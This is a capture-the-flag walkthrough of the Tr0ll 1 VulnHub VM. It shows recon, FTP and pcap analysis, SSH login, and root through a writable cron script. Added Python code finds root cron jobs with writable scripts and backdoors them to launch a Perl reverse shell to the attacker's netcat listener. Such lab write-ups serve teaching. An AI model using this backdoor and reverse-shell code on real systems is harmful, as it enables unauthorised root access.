[Hacking series] – tr0ll 1

Written by  on May 29, 2015 

Code name: tr0ll

Webpage: http://overflowsecurity.com/?p=70

VM download: http://download.vulnhub.com/tr0ll/Tr0ll.rar

Challenge: hack your way into the system and get root

First of all, just after booting the victim box, we locate tr0ll on the network.

# netdiscover


Because the victim VM runs under VirtualBox, its IP is easy to pick out: look at the MAC Vendor column, where VirtualBox's default MAC prefix shows up as CADMUS COMPUTER SYSTEMS.

Now that we have the victim's IP, we use nmap to scan every TCP port (-p-) and collect service information (-A enables version detection, OS detection and the default scripts; -Pn skips host discovery so the scan runs even if the VM ignores pings).

# nmap -Pn -A -p- 192.168.11.8


Nice: ports 21, 22 and 80 are open, and according to the nmap output the FTP server on port 21 allows anonymous login!

# ftp 192.168.11.8


We are logged into the FTP server; after checking our permissions, the only thing we can do here is download lol.pcap.

# get lol.pcap

lol.pcap looks like a Wireshark capture file. Let's open it in Wireshark and see what's inside.


The capture is a “conversation” between an FTP client and an FTP server. Looking closely, an interesting file shows up: secret_stuff.txt. As we just saw, that file is no longer on the FTP server, but its contents travelled over the data connection, so Wireshark can reconstruct them from the capture (Follow TCP Stream).


“we almost found the sup3rs3cr3tdirlol”
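Wireshark is the easy route, but the same information can be pulled out of a capture with nothing but the Python standard library. The following is an added example (not part of the original write-up): a minimal parser for the classic pcap format that walks the Ethernet/IPv4/TCP headers, reassembles every one-way TCP flow by sequence number, lists the commands sent on the FTP control channel and greps the data channel for the hint. The capture it parses is constructed inline as a stand-in for lol.pcap; the addresses, ports and exact packet contents are assumptions, and only the file name secret_stuff.txt and the quoted hint come from the post.

```python
import struct
from collections import defaultdict


def tcp_streams(pcap):
    """Return {(src, sport, dst, dport): reassembled payload} for every
    one-directional TCP flow in a classic (non-pcapng) Ethernet capture."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == 0xA1B2C3D4:
        end = "<"                       # file written little-endian
    elif magic == 0xD4C3B2A1:
        end = ">"                       # file written big-endian
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(end + "I", pcap[20:24])[0]
    if linktype != 1:
        raise ValueError("only Ethernet (linktype 1) is handled here")

    segments = defaultdict(dict)        # flow -> {seq: payload}
    off = 24                            # skip the 24-byte global header
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                    # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:
            continue                    # not TCP
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        data_off = (tcp[12] >> 4) * 4
        payload = tcp[data_off:]
        if payload:
            segments[(src, sport, dst, dport)][seq] = payload
    # Reassemble in sequence order; a retransmitted segment collapses onto its seq.
    return {flow: b"".join(segs[s] for s in sorted(segs))
            for flow, segs in segments.items()}


def ftp_commands(streams):
    """(COMMAND, argument) pairs from every client->server control channel."""
    cmds = []
    for (_src, _sport, _dst, dport), data in streams.items():
        if dport != 21:
            continue
        for line in data.decode("latin-1").splitlines():
            parts = line.strip().split(" ", 1)
            if parts[0]:
                cmds.append((parts[0].upper(), parts[1] if len(parts) > 1 else ""))
    return cmds


def grep_streams(streams, needle):
    """Flows whose reassembled payload contains `needle` (bytes)."""
    return [flow for flow, data in streams.items() if needle in data]


# --- constructed capture, a stand-in for lol.pcap (not the real file) -------

def _packet(src, sport, dst, dport, seq, payload):
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 0x50, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    frame = eth + ip
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame


def build_sample_pcap():
    """Anonymous FTP login, RETR of secret_stuff.txt on the control channel,
    and the file body on a separate data connection (assumed addresses/ports)."""
    client, server = "192.168.11.2", "192.168.11.8"
    convo = [
        (server, 21, client, 40000, b"220 FTP server ready\r\n"),
        (client, 40000, server, 21, b"USER anonymous\r\n"),
        (server, 21, client, 40000, b"331 Please specify the password.\r\n"),
        (client, 40000, server, 21, b"PASS lol\r\n"),
        (server, 21, client, 40000, b"230 Login successful.\r\n"),
        (client, 40000, server, 21, b"RETR secret_stuff.txt\r\n"),
        (server, 21, client, 40000, b"150 Opening BINARY mode data connection.\r\n"),
        (server, 20, client, 40001, b"we almost found the sup3rs3cr3tdirlol\r\n"),
        (server, 21, client, 40000, b"226 Transfer complete.\r\n"),
    ]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    seqs = defaultdict(lambda: 1000)    # per-flow sequence counter
    out = [header]
    for src, sport, dst, dport, payload in convo:
        flow = (src, sport, dst, dport)
        out.append(_packet(src, sport, dst, dport, seqs[flow], payload))
        seqs[flow] += len(payload)
    return b"".join(out)


if __name__ == "__main__":
    streams = tcp_streams(build_sample_pcap())
    for cmd, arg in ftp_commands(streams):
        print(cmd, arg)
    for flow in grep_streams(streams, b"sup3rs3cr3tdirlol"):
        print("hint found in flow", flow, streams[flow])
```

To run it against the real capture, replace `build_sample_pcap()` with `open("lol.pcap", "rb").read()`; if the file was saved as pcapng rather than classic pcap the magic check will reject it, and Wireshark (or `editcap -F pcap`) can convert it.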

Let's keep that hint and move on to the next service, the web server. We start by simply browsing it.


Nothing beyond the expected; no sensitive information there. We use nikto to look for hidden directories.

# nikto -h http://192.168.11.8


The scan finds the “/secret/” directory. Browsing it...


Nothing new, just more trolling. N0w's when the thinkin' begins. After a few minutes I remembered the sup3rs3cr3tdirlol hint and tried it as a directory name in the browser.


Nice, that's actually a directory on the web server, and it contains a single file, which we download.


After a few tries we realize the file is an executable. Running it prints a memory address. Following the same logic as with sup3rs3cr3tdirlol, we try that address as a directory name in the browser.


Nice, now let's look inside those directories.


The first contains a list of users and the second a password. We can try a dictionary attack against the FTP and SSH services on the target machine.

After a few minutes of banging my head against the wall, I realized that the SSH username was “overflow” and the password was “Pass.txt” (trolled again: the password is the file's name, not what is in it). We can log into the system with those credentials.


Nice, we are in. Now we can look for SUID binaries or kernel weaknesses.


But after about 2 minutes inside...


Uh.. something or someone killed our connection. What could it be? A quick check shows that it happens every 2 minutes. Every 2 minutes? Could it be a cron job? Let's see.


We cannot view or edit the crontab, but /var/log/cronlog is readable and gives us some interesting information.


Nice, cron runs a Python script called cleaner every 2 minutes. We use find to locate the file.

# find / -name 'cleaner.py' 2>/dev/null


Now let's read the file.


All that file does is delete everything in /tmp every time it is called.


But it is executed by root, and the file itself is writable by us! Thinking the same? Whatever we put in that script runs as root within 2 minutes, which makes it a great way to do our privilege escalation.

For the next trick we need a netcat listener on port 9988 on our box.


Then, after editing our “perl-reverse-shell.pl” so it points back at our listener, we download it into /tmp on the target machine.


And finally, we edit cleaner.py like this:


Now every 2 minutes the victim sends us a root shell on port 9988 B-). We can go to the fridge, grab a beer and wait for the shell.
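The cron-job privilege escalation used above (spotting a root job whose script we can write to, then editing that script) as an added example, not the post's own code: it parses system-crontab style entries, flags the ones that run as root but point at a script the current user can modify (or whose directory is writable, which lets the file be replaced), and backdoors such a script by inserting the reverse-shell launch before the original cleanup. Because cleaner.py wipes /tmp, which is exactly where perl-reverse-shell.pl was dropped, the payload has to run first, and it is run synchronously so the cleanup cannot race ahead and delete the helper before perl has read it. The crontab text, the sample cleaner.py body, the script location and the path /tmp/perl-reverse-shell.pl are constructed or assumed here; the real layout of /var/log/cronlog and the real path of cleaner.py are not shown on the page.

```python
import os
import tempfile

# Constructed stand-in for the entries in /var/log/cronlog; the real file's
# layout is not shown on the page, so system-crontab syntax
# (minute hour dom month dow user command) is assumed.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *    * * *   root     cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root     python {cleaner}
*/5 *   * * *   www-data /usr/local/bin/rotate_logs.sh
"""

# Assumed path of the downloaded helper; runs synchronously (no '&') so the
# cleanup below it cannot delete the file before perl has loaded it.
PAYLOAD = 'os.system("perl /tmp/perl-reverse-shell.pl")\n'


def parse_system_crontab(text):
    """Return [(schedule, user, command)] from system-crontab style lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)          # 5 schedule fields, user, command
        if len(fields) == 7:
            jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return jobs


def script_path(command):
    """First absolute path in the command that is an existing file; handles
    both 'python /x/y.py' and a bare '/x/y.sh'."""
    for tok in command.split():
        if tok.startswith("/") and os.path.isfile(tok):
            return tok
    return None


def writable_root_jobs(crontab_text):
    """[(command, path)] for jobs that run as root but whose script the
    current user can modify or replace: a direct root-code-execution primitive."""
    hits = []
    for _schedule, user, command in parse_system_crontab(crontab_text):
        path = script_path(command)
        if user != "root" or path is None:
            continue
        if os.access(path, os.W_OK) or os.access(os.path.dirname(path), os.W_OK):
            hits.append((command, path))
    return hits


def backdoor_script(path, payload=PAYLOAD):
    """Insert the payload right after the shebang, ahead of the original body,
    exactly once. Returns True if the file was changed, False if it already
    carried the payload (cron re-runs the job, so the edit must be idempotent)."""
    with open(path) as f:
        lines = f.readlines()
    if any(payload.strip() in line for line in lines):
        return False
    at = 1 if lines and lines[0].startswith("#!") else 0
    lines[at:at] = ["import os\n", payload]
    with open(path, "w") as f:
        f.writelines(lines)
    return True


def run_demo():
    """Build a throwaway directory holding a sample root-run cleaner, find it
    through the crontab, backdoor it twice, and return the intermediate results."""
    workdir = tempfile.mkdtemp()
    cleaner = os.path.join(workdir, "cleaner.py")
    with open(cleaner, "w") as f:     # constructed approximation of cleaner.py
        f.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/*')\n")
    os.chmod(cleaner, 0o666)          # the misconfiguration: world-writable
    crontab = SAMPLE_CRONTAB.format(cleaner=cleaner)
    hits = writable_root_jobs(crontab)
    first = backdoor_script(cleaner)
    second = backdoor_script(cleaner)
    with open(cleaner) as f:
        patched = f.read()
    return {"hits": hits, "first": first, "second": second, "patched": patched}


if __name__ == "__main__":
    result = run_demo()
    print("writable root jobs:", result["hits"])
    print("patched:", result["first"], "re-patched:", result["second"])
    print(result["patched"])
```

On the target the same checks are what you would run by hand: `ls -l` on the script and its directory, and `cat /var/log/cronlog` for the schedule. Keeping the original cleanup in place matters for stealth and because the author relies on the job still firing every 2 minutes.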


Game over tr0ll P-)

Category : hacking series
